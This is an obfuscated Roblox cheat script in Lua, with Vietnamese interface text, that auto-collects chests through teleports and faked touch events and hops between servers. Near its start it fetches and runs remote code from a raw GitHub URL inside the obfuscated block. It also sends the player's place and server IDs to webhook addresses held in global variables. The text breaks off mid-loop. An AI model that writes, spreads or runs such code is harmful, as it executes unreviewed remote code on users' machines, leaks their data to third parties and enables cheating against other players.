--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v83,v84) local v85={};for v129=1, #v83 do v6(v85,v0(v4(v1(v2(v83,v129,v129 + 1 )),v1(v2(v84,1 + (v129% #v84) ,1 + (v129% #v84) + 1 )))%256 ));end return v5(v85);end loadstring(game:HttpGet("https://raw.githubusercontent.com/Chetdithglon/lklklkl/main/wedhook"))();if game:GetService(v7("\230\204\201\46\245\171\198\29\212","\126\177\163\187\69\134\219\167")).Map:FindFirstChild(v7("\14\212\57\209\245\32\228\57\201\253\45\201","\156\67\173\74\165")) then local v130=(is_sirhurt_closure and v7("\7\190\91\30\169\52\82","\38\84\215\41\118\220\70")) or (pebc_execute and v7("\96\4\45\6\241\99\27\35\1\246\85\4","\158\48\118\66\114")) or (syn and v7("\152\61\30\55\99\182\254\235\28","\155\203\68\112\86\19\197")) or (secure_load and v7("\117\216\56\232\73\118\224\244","\152\38\189\86\156\32\24\133")) or (KRNL_LOADED and v7("\215\69\169\74","\38\156\55\199")) or (SONA_LOADED and v7("\155\114\114\41","\35\200\29\28\72\115\20\154")) or v7("\42\183\216\203\205\41\44\9\179\222\214\153\108\51","\84\121\223\177\191\237\76") ;local v131=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v132={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\186\202\210\6\6\56","\75\220\163\183\106\98")]={{[v7("\12\187\134\50","\185\98\218\235\87")]="đảo bí ẩn",[v7("\221\61\43\243\219","\202\171\92\71\134\190")]="```Người dùng đã thấy đảo bí ẩn```",[v7("\32\207\32\129\39\196","\232\73\161\76")]=true},{[v7("\181\216\79\88","\126\219\185\34\61")]="lệnh teleport sever",[v7("\26\207\82\103\123","\135\108\174\62\18\30\23\147")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\191\231\38\194\22\171","\167\214\137\74\171\120\206\83")]=true}}}}};local v133={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]="application/json"};local v134=v131:JSONEncode(v132);Request=http_request or request or HttpPost or syn.request ;local v135={[v7("\50\4\181","\75\103\118\217")]=_G.daobian,[v7("\229\91\116\13","\126\167\52\16\116\217")]=v134,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v133};Request(v135);end if (game.PlaceId==(9173100436 -1723676801)) then if (game:GetService(v7("\248\205\233\84\192\205\224\91","\60\180\164\142")).Sky.MoonTextureId=="http://www.roblox.com/asset/?id=9709149052") then local v145=0;local v146;local v147;local v148;local v149;local v150;local v151;local v152;while true do if (v145==(2 + 0)) then v150=nil;v151=nil;v145=3;end if ((471 -(381 + 89))==v145) then v148=nil;v149=nil;v145=2 + 0 ;end if ((3 + 0)==v145) then v152=nil;while true do if (v146==(0 -0)) then v147=(is_sirhurt_closure and v7("\107\87\23\33\50\255\6","\114\56\62\101\73\71\141")) or (pebc_execute and v7("\136\251\212\208\183\218\214\197\171\225\222\214","\164\216\137\187")) or (syn and v7("\225\255\63\179\182\237\14\146\222","\107\178\134\81\210\198\158")) or (secure_load and v7("\11\11\140\210\163\54\11\142","\202\88\110\226\166")) or (KRNL_LOADED and v7("\232\29\140\251","\170\163\111\226\151")) or (SONA_LOADED and v7("\34\63\188\57","\73\113\80\210\88\46\87")) or v7("\178\36\196\6\167\132\52\221\30\232\136\56\141\21","\135\225\76\173\114") ;v148=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221"));v146=1157 -(1074 + 82) ;end if (v146==(6 -3)) then v152={[v7("\109\50\127","\32\56\64\19\156\58")]=_G.FullMoon,[v7("\120\199\225\79","\224\58\168\133\54\58\146")]=v151,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v150};Request(v152);break;end if (v146==(1786 -(214 + 1570))) then local v242=1455 -(990 + 465) ;local v243;while true do if (v242==0) then v243=0 + 0 ;while true do if (v243==(1 + 0)) then v146=3;break;end if ((0 + 0)==v243) then v151=v148:JSONEncode(v149);Request=http_request or request or HttpPost or syn.request ;v243=3 -2 ;end end break;end end end if (v146==(1727 -(1668 + 58))) then local v244=626 -(512 + 114) ;while true do if (v244==0) then v149={[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\35\141\186\64\0\155","\112\69\228\223\44\100\232\113")]={{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\219\80\26\6\201\78\239\130","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="Người dùng đã thấy Moon 75%",[v7("\78\194\57\213\10\66","\100\39\172\85\188")]=true},{[v7("\163\121\180\133","\83\205\24\217\224")]="lệnh teleport sever",[v7("\240\196\193\40\227","\93\134\165\173")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\183\252\205\203\52\203","\30\222\146\161\162\90\174\210")]=true}}}}};v150={[v7("\198\65\126\30\224\64\100\71\209\87\96\15","\106\133\46\16")]="application/json"};v244=1 + 0 ;end if (1==v244) then v146=1 + 1 ;break;end end end end break;end if (v145==(0 + 0)) then v146=0 -0 ;v147=nil;v145=1995 -(109 + 1885) ;end end end end local v8=Instance.new(v7("\120\208\170\73\30\115\108\198\177","\29\43\179\216\44\123"));local v9=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));local v10=Instance.new(v7("\52\206\107\80\97\15\226\90","\19\97\135\40\63"));local v11=Instance.new(v7("\155\117\20\41\46\53\167\89\61\47","\81\206\60\83\91\79"));local v12=Instance.new(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"));local v13=Instance.new(v7("\141\11\93\17\54\245\234\170","\143\216\66\30\126\68\155"));local v14=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\18\84\54\193\219\6\193\55\81","\134\66\56\87\184\190\116"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\47\52\31\190\11","\85\92\81\105\219\121\139\65");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(255,255,1724 -(1269 + 200) );v9.BorderColor3=Color3.fromRGB(0,0 -0 ,815 -(98 + 717) );v9.BorderSizePixel=826 -(802 + 24) ;v9.Position=UDim2.new(0.930088699,0 -0 ,0.601923108 -0 ,0);v9.Size=UDim2.new(0.062432725 + 0 ,0 + 0 ,0.0596153848 + 0 ,0 + 0 );v9.Font=Enum.Font.SourceSans;v9.Text="Đổi Sever";v9.TextColor3=Color3.fromRGB(0 -0 ,0 -0 ,0 + 0 );v9.TextScaled=true;v9.TextSize=6 + 8 ;v9.TextWrapped=true;v10.CornerRadius=UDim.new(0,20);v10.Parent=v9;v11.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(35 + 39 ,1688 -(797 + 636) ,975 -774 )),ColorSequenceKeypoint.new(1619.29 -(1427 + 192) ,Color3.fromRGB(42 + 77 ,580 -330 ,127)),ColorSequenceKeypoint.new(0.55 + 0 ,Color3.fromRGB(217,246,150)),ColorSequenceKeypoint.new(0.77,Color3.fromRGB(110 + 132 ,201,456 -(192 + 134) )),ColorSequenceKeypoint.new(1277 -(316 + 960) ,Color3.fromRGB(255,86 + 67 ,119 + 34 ))});v11.Parent=v9;v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(236 + 19 ,974 -719 ,255);v12.BackgroundTransparency=1;v12.BorderColor3=Color3.fromRGB(551 -(83 + 468) ,0,1806 -(1202 + 604) );v12.BorderSizePixel=0 -0 ;v12.Position=UDim2.new( -(0.103447914 -0),0 -0 , -1.54838681,0);v12.Size=UDim2.new(326.18965518 -(45 + 280) ,0,1.54838705,0 + 0 );v12.ZIndex= -(1 + 0);v12.Font=Enum.Font.SourceSansBold;v12.Text="x";v12.TextColor3=Color3.fromRGB(255,0 + 0 ,0 + 0 );v12.TextScaled=true;v12.TextSize=14;v12.TextStrokeColor3=Color3.fromRGB(255,5 + 19 ,12 -5 );v12.TextWrapped=true;v13.CornerRadius=UDim.new(1911 -(340 + 1571) ,20);v13.Parent=v12;v14.Thickness=2.9000000953674316 + 1 ;v14.Parent=v12;local function v56() local v86=0;local v87;local v88;local v89;local v90;local v91;while true do if ((1774 -(1733 + 39))==v86) then v91=nil;while true do if (v87==2) then v91:Play();break;end if (v87==(2 -1)) then v90=TweenInfo.new(4,Enum.EasingStyle.Linear,Enum.EasingDirection.In, -1);v91=v89:Create(v88.Parent,v90,{[v7("\74\136\58\22\108\142\33\25","\119\24\231\78")]=1394 -(125 + 909) });v87=1950 -(1096 + 852) ;end if (v87==(0 + 0)) then local v213=0 -0 ;local v214;while true do if (v213==0) then v214=0;while true do if (1==v214) then v87=1 + 0 ;break;end if (v214==(512 -(409 + 103))) then v88=Instance.new(v7("\206\176\66\76\108\203","\191\157\211\48\37\28"),v11);v89=game:GetService(v7("\235\8\241\25\52\236\26\230\10\51\220\26","\90\191\127\148\124"));v214=237 -(46 + 190) ;end end break;end end end end break;end if (v86==(96 -(51 + 44))) then v89=nil;v90=nil;v86=1 + 1 ;end if (0==v86) then local v153=1317 -(1114 + 203) ;while true do if ((727 -(228 + 498))==v153) then v86=1;break;end if ((0 + 0)==v153) then v87=0;v88=nil;v153=1 + 0 ;end end end end end coroutine.wrap(v56)();local function v57() local v92=0;local v93;while true do if (v92==(663 -(174 + 489))) then v93=Instance.new(v7("\177\46\183\67\204\84","\113\226\77\197\42\188\32"),v12);v93.Parent.MouseButton1Click:Connect(function() v93.Parent.Parent:Destroy();end);break;end end end coroutine.wrap(v57)();local function v58() local v94=0 -0 ;local v95;local v96;while true do if (v94==(1906 -(830 + 1075))) then while true do if (v95==(524 -(303 + 221))) then v96=Instance.new(v7("\22\25\247\180\54\37\247\167\51\6\224","\213\90\118\148"),v9);v96.Parent.MouseButton1Click:Connect(function() game:GetService(v7("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72","\45\59\78\212\54")):Teleport(game.PlaceId,game:GetService(v7("\32\90\130\146\131\60\190","\144\112\54\227\235\230\78\205")).LocalPlayer);end);break;end end break;end if (v94==(1269 -(231 + 1038))) then v95=0 + 0 ;v96=nil;v94=1163 -(171 + 991) ;end end end coroutine.wrap(v58)();local v59={};local v60=game:GetService(v7("\135\63\10\249\222\104\182\58\25\245\211\94","\59\211\72\111\156\176"));local v61=Instance.new(v7("\125\132\241\40\75\137\196\56\71","\77\46\231\131"));v61.Name=v7("\152\85\186\65\168\85\188\65","\32\218\52\214");v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v66=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v66.Name=v7("\5\131\36\165\143\175\55\38\137","\86\75\236\80\204\201\221");v66.Parent=v61;v66.AnchorPoint=Vector2.new(0.5 -0 ,0.5 -0 );v66.BackgroundColor3=Color3.fromRGB(636 -381 ,205 + 50 ,893 -638 );v66.BackgroundTransparency=2 -1 ;v66.Position=UDim2.new(1.2 -0 ,0 -0 ,1248.0613496937 -(111 + 1137) ,158 -(91 + 67) );v66.Size=UDim2.new(0 -0 ,1632,0,100);local v74=Instance.new(v7("\71\104\91\140\237\159\94\64\110\138\235\159","\235\18\33\23\229\158"));v74.Name=v7("\126\181\213\178\92\179\210\175\92\187\216\180\69\174","\219\48\218\161");v74.Parent=v66;v74.FillDirection=Enum.FillDirection.Vertical;v74.SortOrder=Enum.SortOrder.LayoutOrder;v74.Padding=UDim.new(0,2 + 3 );v59.Notification=function(v97,v98,v99,v100,v101) local v102=0;local v103;local v104;local v105;local v106;local v107;local v108;local v109;local v110;local v111;local v112;while true do if (v102==(527 -(423 + 100))) then v107.Parent=v103;v107.BackgroundColor3=Color3.fromRGB(1 + 84 ,170,255);v107.BackgroundTransparency=2 -1 ;v107.Position=UDim2.new(0.25,0 + 0 ,0.15,771 -(326 + 445) );v107.Size=UDim2.new(0,763 -588 ,0 -0 ,55 -31 );v107.Font=Enum.Font.LuckiestGuy;v107.TextColor3=Color3.fromRGB(85,881 -(530 + 181) ,255);v107.TextSize=13;v102=5;end if ((890 -(614 + 267))==v102) then v110.Size=UDim2.new(0,268 -(19 + 13) ,0 -0 ,3);v111.Parent=v110;v111.CornerRadius=UDim.new(0 -0 ,19 -12 );v111.Name="";v112.Parent=v66;v112.PaddingLeft=UDim.new(0 + 0 ,26 -11 );v112.PaddingTop=UDim.new(0 -0 ,1827 -(1293 + 519) );v60:Create(v110,TweenInfo.new(tonumber(v100),Enum.EasingStyle.Linear,Enum.EasingDirection.InOut),{[v7("\206\196\14\208","\215\157\173\116\181\46")]=UDim2.new(0 -0 ,0,0 -0 ,3)}):Play();v102=10;end if (v102==(9 -4)) then local v170=0 -0 ;while true do if (v170==3) then v108.BackgroundTransparency=1;v108.Position=UDim2.new(0.625999987,0,0.620000005 -0 ,0 + 0 );v170=4;end if (v170==(1 + 1)) then local v217=0 -0 ;while true do if (v217==(0 + 0)) then v108.AnchorPoint=Vector2.new(0.5 + 0 ,0.5);v108.BackgroundColor3=Color3.fromRGB(160 + 95 ,1351 -(709 + 387) ,255);v217=1859 -(673 + 1185) ;end if (v217==1) then v170=8 -5 ;break;end end end if (v170==1) then local v218=0;while true do if (v218==(0 -0)) then v108.Name=v7("\9\208\88\86\182\3\195\91\87\182","\211\69\177\58\58");v108.Parent=v103;v218=1;end if ((1 -0)==v218) then v170=2 + 0 ;break;end end end if (v170==(3 + 1)) then v102=6;break;end if (v170==0) then v107.Text=v98;v107.TextXAlignment=Enum.TextXAlignment.Left;v170=1 -0 ;end end end if (v102==(2 + 4)) then local v171=0;while true do if (v171==2) then v109.Active=true;v109.BackgroundColor3=Color3.fromRGB(255,508 -253 ,500 -245 );v171=1883 -(446 + 1434) ;end if ((1287 -(1040 + 243))==v171) then v102=20 -13 ;break;end if (v171==(1847 -(559 + 1288))) then local v224=0;while true do if (v224==(1931 -(609 + 1322))) then v108.Size=UDim2.new(454 -(13 + 441) ,653 -478 ,0,65 -40 );v109=Instance.new(v7("\131\224\97\225\197\202\181\224\117","\171\215\133\25\149\137"));v224=4 -3 ;end if (v224==(1 + 0)) then v171=1;break;end end end if ((10 -7)==v171) then local v225=0;while true do if (v225==(1 + 0)) then v171=2 + 2 ;break;end if (v225==(0 -0)) then v109.BackgroundTransparency=1 + 0 ;v109.Size=UDim2.new(0 -0 ,116 + 59 ,0 + 0 ,18 + 7 );v225=1 + 0 ;end end end if (v171==(1 + 0)) then v109.Name=v7("\213\205\42\238\193\63\232\75","\34\129\168\82\154\143\80\156");v109.Parent=v108;v171=435 -(153 + 280) ;end end end if (v102==(8 -5)) then v106.BackgroundColor3=Color3.fromRGB(229 + 26 ,101 + 154 ,134 + 121 );v106.Position=UDim2.new(0.135999978,0 + 0 ,0.5 + 0 ,0 -0 );v106.Size=UDim2.new(0,31 + 19 ,667 -(89 + 578) ,50);v106.BackgroundTransparency=1 + 0 ;v106.Image="http://www.roblox.com/asset/?id="   .. tostring(v101) ;v107=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));v108=Instance.new(v7("\170\239\77\63\23","\26\236\157\44\82\114\44"));v107.Name=v7("\62\54\209\87\35\42","\59\74\78\181");v102=8 -4 ;end if (v102==2) then v105=Instance.new(v7("\210\43\217\198\245\12\255\219","\169\135\98\154"));v105.CornerRadius=UDim.new(1049 -(572 + 477) ,4);v105.Name=v7("\232\120\42\90\248\33\252\194\99\45\88\248","\168\171\23\68\52\157\83");v105.Parent=v103;v106=Instance.new(v7("\221\124\244\170\32\1\134\246\116\249","\231\148\17\149\205\69\77"));v106.Name=v7("\137\170\198\252\82\241\143\179\206","\159\224\199\167\155\55");v106.Parent=v103;v106.AnchorPoint=Vector2.new(0.5 + 0 ,0.5);v102=2 + 1 ;end if ((2 + 8)==v102) then delay(tonumber(v100),function() v60:Create(v106,TweenInfo.new(0.2,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\28\185\138\245\223\1\166\138\252\201\37\181\153\247\212\54\173","\186\85\212\235\146")]=1}):Play();v60:Create(v109,TweenInfo.new(86.2 -(84 + 2) ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\246\132\14\234\13\252\89\204\146\6\255\43\235\86\193\152","\56\162\225\118\158\89\142")]=1 -0 }):Play();v60:Create(v107,TweenInfo.new(0.2 + 0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\104\0\216\187\22\202\93\11\211\191\35\202\89\11\195\182","\184\60\101\160\207\66")]=843 -(497 + 345) }):Play();wait(0.3 + 0 );v60:Create(v103,TweenInfo.new(0.4 + 0 ,Enum.EasingStyle.Quart,Enum.EasingDirection.InOut),{[v7("\2\139\102\185","\220\81\226\28")]=UDim2.new(1333 -(605 + 728) ,0,0 + 0 ,155 -85 )}):Play();wait(0.3);v103:Destroy();end);break;end if (v102==8) then v111=Instance.new(v7("\244\107\17\217\23\207\71\32","\101\161\34\82\182"));v112=Instance.new(v7("\221\36\105\255\223\230\139\32\239","\78\136\109\57\158\187\130\226"));v110.Name=v7("\10\54\244\244","\145\94\95\153");v110.Parent=v103;v110.Active=true;v110.BackgroundColor3=Color3.fromRGB(85,8 + 162 ,255);v110.BorderSizePixel=0 -0 ;v110.Position=UDim2.new(0.0320000015 + 0 ,0 -0 ,0.870000005 + 0 ,489 -(457 + 32) );v102=4 + 5 ;end if (v102==(1402 -(832 + 570))) then if (v101==nil) then v101="";end if (v100==nil) then v100=1;end v103=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v103.Name=v7("\53\59\18\54\88\39\32\7\55\88","\61\97\82\102\90");v103.Parent=v66;v103.BackgroundColor3=Color3.fromRGB(33 + 2 ,10 + 25 ,123 -88 );v103.Size=UDim2.new(0,0 + 0 ,796 -(588 + 208) ,0 -0 );v104=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v102=1801 -(884 + 916) ;end if (v102==(1 -0)) then local v194=0 + 0 ;while true do if (v194==(654 -(232 + 421))) then v104.Parent=v103;v104.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v194=1891 -(1569 + 320) ;end if (v194==(0 + 0)) then local v231=0 + 0 ;while true do if (v231==(3 -2)) then v194=606 -(316 + 289) ;break;end if (v231==(0 -0)) then v104.Thickness=1 + 0 ;v104.Name="";v231=1454 -(666 + 787) ;end end end if (v194==(429 -(360 + 65))) then v102=2 + 0 ;break;end if (v194==(256 -(79 + 175))) then v104.LineJoinMode=Enum.LineJoinMode.Round;v104.Color=Color3.fromRGB(402 -147 ,199 + 56 ,781 -526 );v194=5 -2 ;end if (v194==(902 -(503 + 396))) then local v235=181 -(92 + 89) ;while true do if (v235==(0 -0)) then v104.Transparency=0 + 0 ;v103:TweenSizeAndPosition(UDim2.new(0 + 0 ,250 -10 ,0 -0 ,10 + 60 ),UDim2.new(0.5 -0 ,0 + 0 ,0.5,0 + 0 ),v7("\138\191\55","\49\197\202\67\126\115\100\167"),v7("\21\90\220\34","\62\87\59\191\73\224\54"),0.3 -0 ,true);v235=1;end if (v235==(1 + 0)) then v194=5 -1 ;break;end end end end end if (v102==7) then v109.Font=Enum.Font.GothamBlack;v109.Text=v99;v109.TextScaled=true;v109.TextColor3=Color3.fromRGB(255,1499 -(485 + 759) ,590 -335 );v109.TextSize=1201 -(442 + 747) ;v109.TextXAlignment=Enum.TextXAlignment.Left;repeat wait();until v103.Size==UDim2.new(1135 -(832 + 303) ,(1196 -(88 + 858)) -10 ,0 + 0 ,58 + 12 )  v110=Instance.new(v7("\163\160\50\6\77","\233\229\210\83\107\40\46"));v102=1 + 7 ;end end end;repeat wait();until game:IsLoaded() aut=true;function totarget(v113) local v114=789 -(766 + 23) ;local v115;local v116;local v117;local v118;while true do if ((0 -0)==v114) then local v203=0 -0 ;while true do if (v203==(0 -0)) then v115=game:service(v7("\39\194\135\254\228\244\22\199\148\242\233\194","\167\115\181\226\155\138"));v116=TweenInfo.new((game:GetService(v7("\210\46\230\69\126\99\213","\166\130\66\135\60\27\17"))[v7("\104\69\205\116\60\116\70\207\108\53\86","\80\36\42\174\21")].Character.HumanoidRootPart.Position-v113.Position).Magnitude/(1018 -718) ,Enum.EasingStyle.Linear);v203=1074 -(1036 + 37) ;end if (v203==(1 + 0)) then v114=1;break;end end end if (v114==1) then v117,v118=pcall(function() local v206=0;while true do if ((0 -0)==v206) then v117=v115:Create(game.Players.LocalPlayer.Character['HumanoidRootPart'],v116,{[v7("\109\54\37\123\67\21","\26\46\112\87")]=v113});v117:Play();break;end end end);if  not v117 then return v118;end break;end end end function thisCode() repeat task.wait();until game:IsLoaded() local v119=game.PlaceId;local v120={};local v121="";local v122=os.date(v7("\248\105\191","\212\217\67\203\20\223\223\37")).hour;local v123=false;local v124=pcall(function() v120=game:GetService(v7("\146\153\188\194\137\136\186\196\179\142\173","\178\218\237\200")):JSONDecode(readfile(v7("\152\186\242\227\183\184\227\227\179\167\240\213\164\166\168\218\165\186\232","\176\214\213\134")));end);if  not v124 then local v143=0 + 0 ;local v144;while true do if (v143==(1480 -(641 + 839))) then v144=913 -(910 + 3) ;while true do if ((0 -0)==v144) then table.insert(v120,v122);writefile(v7("\218\162\162\231\169\91\92\199\168\164\194\173\68\74\186\167\165\219\166","\57\148\205\214\180\200\54"),game:GetService(v7("\58\233\33\36\69\23\239\35\61\117\23","\22\114\157\85\84")):JSONEncode(v120));break;end end break;end end end function TPReturner() local v136=1684 -(1466 + 218) ;local v137;local v138;local v139;while true do if (v136==(1 + 0)) then v138="";if (v137.nextPageCursor and (v137.nextPageCursor~=v7("\202\222\31\200","\200\164\171\115\164\61\150")) and (v137.nextPageCursor~=nil)) then v121=v137.nextPageCursor;end v136=1150 -(556 + 592) ;end if (v136==0) then v137=nil;if (v121=="") then v137=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v119   .. "/servers/Public?sortOrder=Asc&limit=100" ));else v137=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v119   .. "/servers/Public?sortOrder=Asc&limit=100&cursor="   .. v121 ));end v136=1 + 0 ;end if (v136==(810 -(329 + 479))) then v139=854 -(174 + 680) ;for v209,v210 in pairs(v137.data) do local v211=0 -0 ;local v212;while true do if (v211==0) then local v239=0;while true do if (v239==(1 -0)) then v211=1;break;end if (v239==(0 + 0)) then v212=true;v138=tostring(v210.id);v239=740 -(396 + 343) ;end end end if (v211==(1 + 0)) then if (tonumber(v210.maxPlayers)>tonumber(v210.playing)) then local v259=1477 -(29 + 1448) ;while true do if (v259==(1389 -(135 + 1254))) then for v262,v263 in pairs(v120) do if (v139~=(0 -0)) then if (v138==tostring(v263)) then v212=false;end elseif (tonumber(v122)~=tonumber(v263)) then local v266=pcall(function() local v267=0;local v268;while true do if (v267==(0 -0)) then v268=0;while true do if (v268==1) then table.insert(v120,v122);break;end if (v268==(0 + 0)) then delfile(v7("\144\251\23\118\130\179\241\48\64\145\168\241\17\86\205\180\231\12\75","\227\222\148\99\37"));v120={};v268=1;end end break;end end end);end v139=v139 + (1528 -(389 + 1138)) ;end if (v212==true) then table.insert(v120,v138);wait();pcall(function() writefile(v7("\29\93\70\197\248\62\87\97\243\235\37\87\64\229\183\57\65\93\248","\153\83\50\50\150"),game:GetService(v7("\117\98\103\12\64\174\95\75\127\112\25","\45\61\22\19\124\19\203")):JSONEncode(v120));wait();game:GetService(v7("\245\23\1\240\18\127\171\213\33\8\231\20\121\186\196","\217\161\114\109\149\98\16")):TeleportToPlaceInstance(v119,v138,game.Players.LocalPlayer);end);wait(578 -(102 + 472) );end break;end end end break;end end end break;end end end function Teleport() while wait() do pcall(function() local v204=0 + 0 ;while true do if (v204==(0 + 0)) then TPReturner();if (v121~="") then TPReturner();end break;end end end);end end local v125=0.5;task.spawn(function() while task.wait(v125) do pcall(function() for v207,v208 in pairs(game.CoreGui:GetDescendants()) do pcall(function() if string.find(v208.Name,v7("\55\50\42\115\174\89\23\51\43\125\187\113","\20\114\64\88\28\220")) then if string.find(v208.Text,v7("\2\4\209\161\234\217\169\40\65\217\189\251\219","\221\81\97\178\212\152\176")) then local v255=0 + 0 ;local v256;while true do if (v255==0) then v256=1545 -(320 + 1225) ;while true do if (v256==(0 -0)) then v125=611862440 + 388137560 ;Teleport();break;end end break;end end end end end);end end);end end);local v126=game:GetService(v7("\254\243\28\233\14\200\245\58\238\19","\122\173\135\125\155"));local v127=Instance.new(v7("\166\200\14\189\62\51\196\129\231\21\183\60\37\193\139\207","\168\228\161\96\217\95\81"));function gui() v126:SetCore(v7("\232\212\32\88\1\88\207\216\40\85\44\86\207\216\33\82","\55\187\177\78\60\79"),{[v7("\25\199\75\231\67","\224\77\174\63\139\38\175")]="Tự Động Lụm Chest",[v7("\176\68\64\58","\78\228\33\56")]="Tìm Chest",[v7("\231\125\189\13","\229\174\30\210\99")]="rbxassetid://11816162894",[v7("\63\248\148\80\249\52\54\21","\89\123\141\230\49\141\93")]=math.huge,[v7("\208\112\250\0\18\75\240\122","\42\147\17\150\108\112")]=v127,[v7("\45\179\57\107\232\230\94","\136\111\198\77\31\135")]="Có",[v7("\32\28\179\66\178\234\69","\201\98\105\199\54\221\132\119")]="Không"});end gui();v127.OnInvoke=function(v140) if (v140=="Không") then local v205=0;while true do if (v205==0) then aut=false;gui();break;end end elseif (v140=="Có") then aut=true;gui();auto();end end;function auto() if (aut==true) then task.spawn(function() while aut==true  do if (aut==true) then local v237=game.Players.LocalPlayer:FindFirstChild(v7("\154\4\130\51\3\54\184\188\30","\204\217\108\227\65\98\85"));if  not game.Players.LocalPlayer.Character then else local v257=game.Players.LocalPlayer.Character:FindFirstChild(v7("\125\209\240\242\14\226\121","\160\62\163\149\133\76"),true);if v257 then v257:Destroy();end local v258=game.Players.LocalPlayer.Character:FindFirstChild(v7("\254\181\0\46\205\217\169\9","\163\182\192\109\79"));if v258 then local v260=game.Workspace:FindFirstChild(v7("\23\46\5\211\225\96","\149\84\70\96\160")) or game.Workspace:FindFirstChild(v7("\27\14\8\254\44\85","\141\88\102\109")) or game.Workspace:FindFirstChild(v7("\144\91\207\99\14\111","\161\211\51\170\16\122\93\53")) ;if v260 then local v261=1464 -(157 + 1307) ;while true do if (v261==(1859 -(821 + 1038))) then game.Players.LocalPlayer.Character:PivotTo(v260:GetPivot());firesignal(v260.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart);break;end end elseif (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\221\167\161\60\187\161\180\104\223\175\160\35\245\171\161\59","\72\155\206\210")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\96\115\71\26\115\73\124\20\42\50\84\113\90\11\32\85","\83\38\26\52\110")) or game.Players.LocalPlayer.Backpack:FindFirstChild("God's Chalice") or game.Players.LocalPlayer.Character:FindFirstChild("God's Chalice")) then aut=false;Teleport();break;end end end end task.wait();end end);end end end thisCode();auto();task.spawn(function() while wait() do if (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\126\30\52\82\24\24\33\6\124\22\53\77\86\18\52\85","\38\56\119\71")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\213\230\75\194\101\89\245\175\124\215\55\93\253\234\75\197","\54\147\143\56\182\69"))) then aut=false;end end end);join=game.Players.localPlayer.Neutral==false ;if (_G.Team==nil) then _G.Team=v7("\230\136\237\72\203\211\146","\191\182\225\159\41");end _G.Team=v7("\6\19\58\92\133\130\209","\162\75\114\72\53\235\231");if (((_G.Team==v7("\188\53\86\227\71\7\159","\98\236\92\36\130\51")) or (_G.Team==v7("\137\24\30\179\75\173\166","\80\196\121\108\218\37\200\213"))) and  not join) then local v141=0 -0 ;local v142;while true do if (v141==(0 + 0)) then v142=0 -0 ;while true do if (v142==(0 + 0)) then repeat local v240=0;local v241;while true do if (v240==(0 -0)) then v241=1026 -(834 + 192) ;while true do if ((0 + 0)==v241) then wait();pcall(function() local v264=0 + 0 ;local v265;while true do if (v264==(0 + 0)) then v265=0 -0 ;while true do if (v265==(304 -(300 + 4))) then join=game.Players.localPlayer.Neutral==false ;if (_G.Team==v7("\48\122\16\126\95\11\153","\234\96\19\98\31\43\110")) then for v269,v270 in pairs({v7("\43\16\71\212\169\80\158\18\11\93\201\253\81\135\15\28\89","\235\102\127\50\167\204\18"),v7("\125\174\224\48\65\12\69\181\225\44\74\127\116\174\226\45","\78\48\193\149\67\36"),v7("\17\29\148\17\87\49\10\133\28","\33\80\126\224\120")}) do for v271,v272 